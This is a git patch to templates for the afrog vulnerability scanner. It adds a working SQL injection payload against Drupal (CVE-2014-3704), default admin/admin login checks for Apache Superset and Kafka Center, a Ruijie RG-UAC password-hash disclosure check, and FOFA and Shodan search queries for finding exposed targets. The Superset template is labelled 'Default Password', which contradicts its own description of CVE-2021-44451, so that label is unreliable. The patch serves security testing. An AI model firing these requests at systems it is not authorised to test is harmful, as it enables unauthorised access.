From 004321dbaff6880da105a6a7202c54d0cbcf0197 Mon Sep 17 00:00:00 2001
From: zan8in <zanbin168@qq.com>
Date: Wed, 6 Apr 2022 22:37:38 +0800
Subject: [PATCH] cve-2021-44451 && kafaka-default-pwd

---
 afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml     |  8 +++--
 afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml     |  2 ++
 afrog-pocs/CVE/2014/CVE-2014-3704.yaml        |  6 ++--
 afrog-pocs/CVE/2021/CVE-2021-44451.yaml       | 35 +++++++++++++++++++
 .../kafka-center-default-password.yaml        | 20 +++++++++++
 .../unreviewed => pocs}/CVE-2022-22965.yaml   |  0
 6 files changed, 66 insertions(+), 5 deletions(-)
 create mode 100644 afrog-pocs/CVE/2021/CVE-2021-44451.yaml
 create mode 100644 afrog-pocs/default-pwd/kafka-center-default-password.yaml
 rename {afrog-pocs/unreviewed => pocs}/CVE-2022-22965.yaml (100%)

diff --git a/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml b/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml
index b2b79a48..ed54d34f 100644
--- a/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml
+++ b/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml
@@ -1,14 +1,16 @@
 id: CNVD-2021-14536
 
 info:
-    name: 锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞
-    author: jweny(https://github.com/jweny)
+    name: Ruijie RG-UAC Information Disclosure
+    author: jweny(https://github.com/jweny) daffainfo
     severity: high
+    description: |
+        fofa-query: 'title="RG-UAC登录页面"'
 
 rules:
     r0:
         request:
             method: GET
             path: /login.php
-        expression: response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
+        expression: response.status == 200 && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
 expression: r0()
diff --git a/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml b/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml
index 7999a483..04a31979 100644
--- a/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml
+++ b/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml
@@ -4,6 +4,8 @@ info:
     name: ShopXO File Read
     author: Print1n(http://print1n.top)
     severity: high
+    reference:
+        - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
 
 rules:
     Linux0:
diff --git a/afrog-pocs/CVE/2014/CVE-2014-3704.yaml b/afrog-pocs/CVE/2014/CVE-2014-3704.yaml
index 15315c68..0863f44b 100644
--- a/afrog-pocs/CVE/2014/CVE-2014-3704.yaml
+++ b/afrog-pocs/CVE/2014/CVE-2014-3704.yaml
@@ -5,12 +5,14 @@ info:
     author: unkown
     severity: high
 
+set:
+    rand: randomInt(200000000, 210000000)
 rules:
     r0:
         request:
             method: POST
             path: /?q=node&destination=node
-            body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
-        expression: response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
+            body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,(select md5({{rand}}))),0)%23]=bob&name[0]=a
+        expression: response.status == 500 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
 expression: r0()
 
diff --git a/afrog-pocs/CVE/2021/CVE-2021-44451.yaml b/afrog-pocs/CVE/2021/CVE-2021-44451.yaml
new file mode 100644
index 00000000..a8473402
--- /dev/null
+++ b/afrog-pocs/CVE/2021/CVE-2021-44451.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-44451
+
+info:
+  name: Apache Superset Default Password
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
+    Users should upgrade to Apache Superset 1.4.0 or higher.
+    Fofa: app="APACHE-Superset"
+  reference:
+    - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
+
+set:
+  refererUrl: request.url
+rules:
+  r0:
+    request:
+      method: GET
+      path: /login/
+    expression: response.status == 200
+    output:
+      search: '"value=\"(?P<cs_token>.*?)\">".bsubmatch(response.body)'
+      cs_token: search["cs_token"]
+  r1:
+    request:
+      method: POST
+      path: /login/
+      headers:
+        Referer: "{{refererUrl}}/admin/airflow/login"
+      body: |
+        csrf_token={{cs_token}}&username=admin&password=admin
+    expression: response.status == 302 && response.body.bcontains(b'<title>Redirecting...</title>') && response.body.bcontains(b'<h1>Redirecting...</h1>')  && response.body.bcontains(b'<a href="/">') && response.raw_header.bcontains(b'session')
+expression: r0() && r1()
\ No newline at end of file
diff --git a/afrog-pocs/default-pwd/kafka-center-default-password.yaml b/afrog-pocs/default-pwd/kafka-center-default-password.yaml
new file mode 100644
index 00000000..79c6aefa
--- /dev/null
+++ b/afrog-pocs/default-pwd/kafka-center-default-password.yaml
@@ -0,0 +1,20 @@
+id: kafka-center-default-password
+
+info:
+  name: Apache Kafka Center Default Password
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    shodan-query: http.title:"Kafka Center"
+
+rules:
+  r0:
+    request:
+      method: POST
+      path: /login/system
+      headers:
+        Content-Type: application/json
+      body: |
+        {"name":"admin","password":"admin","checkbox":false}
+    expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"name":"admin"')
+expression: r0()
\ No newline at end of file
diff --git a/afrog-pocs/unreviewed/CVE-2022-22965.yaml b/pocs/CVE-2022-22965.yaml
similarity index 100%
rename from afrog-pocs/unreviewed/CVE-2022-22965.yaml
rename to pocs/CVE-2022-22965.yaml